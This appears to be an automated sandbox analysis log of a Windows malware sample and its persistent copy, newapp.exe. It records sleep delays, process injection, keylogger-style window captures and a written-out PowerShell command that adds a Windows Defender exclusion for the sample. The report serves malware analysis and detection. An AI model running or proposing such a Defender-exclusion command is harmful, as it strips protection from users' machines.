Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 594919	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 594576	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 594468	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 594329	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 594207	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Thread delayed: delay time: 594078	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599341	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598988	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597141	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596797	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596563	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596232	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596016	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595141	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594450	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594338	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599888
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599343
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598999
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598834
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598685
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598578
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598468
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598358
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598250
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598140
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598031
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597920
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597812
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597703
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597593
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597484
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597375
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597265
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597155
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597046
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596937
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596828
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596718
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596609
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596500
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596390
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596280
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596121
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596015
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595906
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595797
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595672
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595562
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595453
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595343
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595234
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595125
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595015
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594906
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594797
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594672
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594562
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594453

Source: iNFGd6bDZX.exe, 00000000.00000002.1726457785.0000000003EA1000.00000004.00000800.00020000.00000000.sdmp, iNFGd6bDZX.exe, 00000000.00000002.1731244450.0000000009710000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: faBeSpqeMu
Source: newapp.exe, 0000000E.00000002.2920974960.0000000000F57000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
Source: iNFGd6bDZX.exe, 00000005.00000002.2923279667.00000000017CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
Source: newapp.exe, 0000000A.00000002.2954066847.0000000005E80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iNFGd6bDZX.exe"
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iNFGd6bDZX.exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe

Memory written: C:\Users\user\Desktop\iNFGd6bDZX.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iNFGd6bDZX.exe"	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process created: C:\Users\user\Desktop\iNFGd6bDZX.exe "C:\Users\user\Desktop\iNFGd6bDZX.exe"	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process created: C:\Users\user\Desktop\iNFGd6bDZX.exe "C:\Users\user\Desktop\iNFGd6bDZX.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"

Source: iNFGd6bDZX.exe, 00000005.00000002.2927556251.00000000034BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: iNFGd6bDZX.exe, 00000005.00000002.2927556251.00000000034BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q9<b>[ Program Manager]</b> (11/01/2025 11:05:13)<br>{Win}rTHcqd$L
Source: iNFGd6bDZX.exe, 00000005.00000002.2927556251.00000000034BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q
Source: iNFGd6bDZX.exe, 00000005.00000002.2927556251.00000000034BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q8<b>[ Program Manager]</b> (11/01/2025 11:05:13)<br>{Win}THcqd$L
Source: iNFGd6bDZX.exe, 00000005.00000002.2927556251.00000000034BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q3<b>[ Program Manager]</b> (11/01/2025 11:05:13)<br>

Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Users\user\Desktop\iNFGd6bDZX.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
